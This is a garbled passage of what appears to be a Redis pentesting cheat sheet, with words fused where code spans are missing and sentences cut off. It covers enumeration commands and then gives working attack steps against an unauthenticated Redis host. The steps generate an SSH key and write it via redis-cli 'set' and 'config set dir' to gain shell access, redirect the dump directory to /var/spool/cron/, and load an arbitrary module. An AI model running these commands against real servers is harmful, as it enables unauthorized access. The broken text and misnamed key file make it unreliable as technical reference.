ncor you could also use
info. It may return output with information of the Redis instance or something like the following is returned:
requirepassor temporary until the service restarts connecting to it and running:
config set requirepass [email protected]$12E45. Also, a username can be configured in the parameter
masteruserinside the redis.conf file.
monitoror get the top 25 slowest queries with
slowlog get 25
infoinside the "Keyspace" chunk:
-WRONGTYPE Operation against a key holding the wrong kind of valuewhile running
GET <KEY>it's because the key may be something else than a string or an integer and requires a special operator to display it.
TYPEcommand, example below for list and hash keys.
config get dirresult can be changed after other manually exploit commands. Suggest to run it first right after login into Redis. In the output of
config get diryou could find the home of the redis user (usually /var/lib/redis or /home/redis/.ssh), and knowing this you know where you can write the
authenticated_usersfile to access via ssh with the user redis. If you know the home of other valid user where you have writable permissions you can also abuse it:
ssh-keygen -t rsa
(echo -e "\n\n"; cat ~/id_rsa.pub; echo -e "\n\n") > spaced_key.txt
cat spaced_key.txt | redis-cli -h 10.85.0.52 -x set ssh_key
redis-cli -h 10.85.0.52 config set dir /var/spool/cron/
MODULE LOAD /path/to/mymodule.so
MODULE UNLOAD mymodule
whoamiand send back the output via
gitscheme and not with the